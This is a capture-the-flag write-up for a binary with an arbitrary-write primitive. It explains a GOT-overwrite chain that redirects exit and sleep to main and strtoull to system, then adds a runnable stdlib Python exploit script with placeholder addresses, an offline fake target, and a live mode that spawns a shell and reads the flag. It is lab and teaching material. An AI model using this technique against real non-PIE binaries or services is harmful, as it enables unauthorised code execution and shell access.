Last updated
The binary takes an address and a number, both in hex, and writes the number to that address: an arbitrary write primitive. The hex is parsed with strtoull, which becomes useful later.
After the write it calls sleep(0xf), then prints the address of alarm and calls exit. The printed alarm address is our libc leak. The binary is Partial RELRO, so the GOT is writable and we can overwrite entries (this also relies on the binary not being PIE: main and the GOT slots have to be at known addresses). Here's what we do:
Overwrite exit@got with the address of main. When the program tries to exit after printing the libc pointer to us, it calls main instead, giving us another write.
Overwrite sleep@got with main. We couldn't do this earlier, because the alarm leak only comes after sleep, but we don't need any more leaks now, so the alarm doesn't catch us out and the exploit is quick from here on.
Overwrite strtoull@got with system, so the next time the program tries to parse our input as hex it calls system on that input instead.
Enter /bin/sh as the next address.
A shell pops and we can cat flag.txt.
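The chain above as a runnable script. This is an added example using only the Python standard library (no pwntools), not the original writeup's exploit. Every address in it is a hypothetical placeholder: main comes from the (non-PIE) binary, the GOT slots from objdump -R, and the alarm/system offsets from the challenge's libc; the "addr value" line format is an assumption about how the program reads its two hex fields, and the FakeTarget class with its leak line is constructed so the script can be dry-run offline.

```python
"""Exploit skeleton for the arbitrary-write + GOT-overwrite chain above.
Added example (stdlib only), not the writeup's own script. All addresses
are hypothetical placeholders: main from the assumed non-PIE binary, GOT
slots from `objdump -R`, libc offsets from `readelf -s libc.so.6`."""
import re
import socket
import sys

MAIN_ADDR = 0x401196                                                # placeholder
GOT = {"exit": 0x404038, "sleep": 0x404030, "strtoull": 0x404028}  # placeholders
LIBC_OFF = {"alarm": 0x0E5E00, "system": 0x052290}                 # placeholders

PTR_RE = re.compile(rb"0x[0-9a-fA-F]+")


def parse_leak(line: bytes) -> int:
    """Pull the printed alarm pointer (first 0x... token) out of an output line."""
    m = PTR_RE.search(line)
    if m is None:
        raise ValueError(f"no hex pointer in {line!r}")
    return int(m.group(0), 16)


def libc_base(alarm_leak: int) -> int:
    """Leak minus the symbol offset; a misaligned result means the wrong libc."""
    base = alarm_leak - LIBC_OFF["alarm"]
    if base & 0xFFF:
        raise ValueError("libc base not page aligned: wrong libc offsets?")
    return base


def encode_write(addr: int, value: int) -> bytes:
    """One write request. Assumed input format: '<addr> <value>\\n', both hex,
    matching what strtoull on the two fields would parse."""
    return f"{addr:#x} {value:#x}\n".encode()


def read_line(io) -> bytes:
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = io.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf


def read_leak(io) -> int:
    """Skip any banner/prompt lines until one carries a 0x... pointer."""
    while True:
        line = read_line(io)
        if not line:
            raise EOFError("connection closed before the leak arrived")
        if PTR_RE.search(line):
            return parse_leak(line)


def run(io) -> int:
    """Drive the chain over any object with sendall()/recv(); returns libc base."""
    # 1. exit@got -> main: after the leak is printed, exit() re-enters main
    io.sendall(encode_write(GOT["exit"], MAIN_ADDR))
    base = libc_base(read_leak(io))                  # arrives after sleep(0xf)
    # 2. sleep@got -> main: no more 15 s waits (and no more leaks, not needed)
    io.sendall(encode_write(GOT["sleep"], MAIN_ADDR))
    # 3. strtoull@got -> system: the next "address" we send goes to system()
    io.sendall(encode_write(GOT["strtoull"], base + LIBC_OFF["system"]))
    # 4. the string strtoull would have parsed is now system()'s command line
    io.sendall(b"/bin/sh\n")
    return base


class FakeTarget:
    """Offline stand-in for the service: records sends and answers the first
    write with a constructed leak line (not real output from the challenge)."""
    LEAK_LINE = b"alarm @ 0x7f3a1c2e5e00\n"         # constructed sample leak

    def __init__(self):
        self.sent, self._rx = [], b""

    def sendall(self, data: bytes):
        self.sent.append(data)
        if len(self.sent) == 1:
            self._rx += self.LEAK_LINE

    def recv(self, n: int) -> bytes:
        chunk, self._rx = self._rx[:n], self._rx[n:]
        return chunk


if __name__ == "__main__":
    if len(sys.argv) == 3:                          # python3 exploit.py HOST PORT
        s = socket.create_connection((sys.argv[1], int(sys.argv[2])), timeout=30)
        run(s)
        s.sendall(b"cat flag.txt\n")
        print(s.recv(4096).decode(errors="replace"))
    else:                                           # dry run against the fake
        t = FakeTarget()
        print(f"libc base {run(t):#x}")
        for line in t.sent:
            print(line)
```

Run with no arguments for the dry run, or with HOST PORT against the live service; the 30 second socket timeout exists because the first leak only arrives after sleep(0xf). Only the first write has to wait: once sleep@got points at main, every later iteration jumps straight back to the input prompt.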